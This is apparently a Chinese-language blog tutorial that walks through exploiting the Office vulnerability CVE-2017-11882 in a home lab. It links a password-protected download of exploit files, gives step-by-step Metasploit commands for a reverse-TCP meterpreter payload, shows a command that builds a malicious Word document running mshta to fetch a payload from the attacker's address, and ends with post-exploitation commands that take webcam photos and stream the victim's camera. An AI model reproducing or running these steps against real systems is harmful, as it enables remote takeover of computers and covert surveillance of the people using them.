2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。gongji者可以利用漏洞以当前登录的用户的身份执行任意命令。漏洞影响版本:Office 365 Microsoft Office 2000

 Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 Microsoft Office 2013 Service Pack 1 Microsoft Office 2016 

工具链接:https://pan.baidu.com/s/1cAPboI5lawjxD2VPT13ABA 密码:fxrf 还是老样子KaliLinux做gongji机 ip:192.168.1.126 受害者主机Windows7 ip:192.168.1.128 1.首先把cve开头的文件放到kalilinux使用 2.将cve_2017_11882.rb文件复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下 mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ ls /usr/share/metasploit-framework/modules/exploits/windows/smb/ 查看一下 3.再将cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/ 目录下 mv cve_2017_11882.rtf /usr/share/metasploit-framework/data/exploits ls /usr/share/metasploit-framework/data/exploits 4.打开神器图形化操作的msf(命令都一样只是这个更容易方便演示) 为了你们太萌新我特地标了一下如何扫描ip地址和爆系统然后输入ip地址即可(只是为了效果好而已)

小电脑就出来了还猜出来是Windows7 5.然后在下面输入search cve_2017_11882查看有没有加载进去这个模块 可能我版本比较高所以官方已经出了这个模块所以有两个 6.use exploit/windows/smb/cve_2017_11882 使用这个模块 7.set payload windows/meterpreter/reverse_tcp show options 查看一下配置 8.set lhost 192.168.1.126 为自己的gongji机 set uripath emmm emmm为路径稍后用python生成脚本的时候用得到(后面我又改成test了 然后 set lport 4444改一下端口才运行) show options 再看一下配置

(后面uripath我又改成test了 然后 set lport 4444改一下端口才运行) 9.exploit -j 运行 10.在终端生成doc文件 python Command109b_CVE-2017-11882.py -c "mshta http://192.168.1.126:8080/test" -o test.doc 生成doc文件 然后将doc文件放到Windows7上(顺便安装office) 看到这个文档然后手贱点了一下 成功 然后还是老样子 getuid getpid getvnc webcam_list 查看下摄像头 webcam_snf 1 照个照片 webcam_stream 开个网页查看摄像头